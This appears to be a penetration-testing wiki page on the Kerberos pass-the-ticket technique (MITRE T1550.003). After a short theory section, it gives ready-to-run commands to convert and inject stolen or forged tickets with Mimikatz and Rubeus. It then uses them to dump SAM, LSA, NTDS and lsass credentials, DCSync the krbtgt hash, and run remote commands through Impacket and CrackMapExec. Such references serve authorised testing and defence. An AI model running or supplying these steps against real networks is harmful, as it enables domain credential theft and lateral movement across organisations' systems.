Pass the ticket

MITRE ATT&CK™ Sub-technique T1550.003

Theory

​Overpass-the-hash, silver ticket and golden ticket attacks are used by attackers to obtain illegitimate tickets. A ticket (TGT or service ticket, forged or not) can then be used to authenticate to a system using Kerberos without knowing any password. This is called Pass-the-ticket.

Practice

Tip: convert ticket to UNIX <-> Windows format

To convert tickets between UNIX/Windows format with ticketConverter.py.

# Windows -> UNIX
ticketConverter.py $ticket.kirbi $ticket.ccache
​
# UNIX -> Windows
ticketConverter.py $ticket.ccache $ticket.kirbi

Injecting the ticket

  • On Windows systems, tools like Mimikatz and Rubeus inject the ticket in memory. Native Microsoft tools can then use the ticket just like usual.

  • On UNIX-like systems, the path to the .ccache ticket to use has to be referenced in the environment variable KRB5CCNAME

UNIX-like
Windows
UNIX-like

Once a ticket is obtained/created, it needs to be referenced in the KRB5CCNAME environment variable for it to be used by others tools.

export KRB5CCNAME=$path_to_ticket.ccache
Windows

The most simple way of injecting the ticket is to supply the /ptt flag directly to the command used to request/create a ticket. Both mimikatz and Rubeus accept this flag.

This can also be done manually with mimikatz or Rubeus.

# use a .kirbi file
kerberos::ptt $ticket_kirbi_file
​
# use a .ccache file
kerberos::ptt $ticket_ccache_file
Rubeus.exe ptt /ticket:$ticket_kirbi_file

It is then possible to list the tickets in memory using the klist command.

Passing the ticket

  • On Windows, once Kerberos tickets are injected, they can be used natively.

  • On UNIX-like systems, once the KRB5CCNAME variable is exported, the ticket can be used by tools that support Kerberos authentication.

Credentials dumping
Command execution
Credentials dumping

The Impacket scripts like secretsdump (Python) have the ability to remotely dump hashes and LSA secrets from a machine.

secretsdump.py -k $TARGET

​CrackMapExec (Python) has the ability to do it on a set of targets. The bh_owned has the ability to set targets as "owned" in BloodHound (see dumping credentials from registry hives).

crackmapexec smb $TARGETS -k --sam
crackmapexec smb $TARGETS -k --lsa
crackmapexec smb $TARGETS -k --ntds

​Lsassy (Python) has the ability to do it with higher success probabilities as it offers multiple dumping methods. This tool can set targets as "owned" in BloodHound. It works in standalone but also as a CrackMapExec module (see dumping credentials from lsass process memory).

crackmapexec smb $TARGETS -k -M lsassy
crackmapexec smb $TARGETS -k -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd
lsassy -k $TARGETS

On Windows, once the ticket is injected, it will natively be used when accessing a service, for example with Mimikatz to extract the krbtgt hash.

lsadump::dcsync /dc:$DomainController /domain:$DOMAIN /user:krbtgt
Command execution

Some Impacket scripts (Python) enable testers to execute commands on target systems with Kerberos support.

psexec.py -k 'DOMAIN/USER@TARGET'
smbexec.py -k 'DOMAIN/USER@TARGET'
wmiexec.py -k 'DOMAIN/USER@TARGET'
atexec.py -k 'DOMAIN/USER@TARGET'
dcomexec.py -k 'DOMAIN/USER@TARGET'

​CrackMapExec (Python) has the ability to do it on a set of targets

crackmapexec winrm $TARGETS -k -x whoami
crackmapexec smb $TARGETS -k -x whoami

On Windows, legitimate tools like the sysinternals PsExec (download) can then be used to open a cmd using that ticket.

.\PsExec.exe -accepteula \\$TARGET cmd

Resources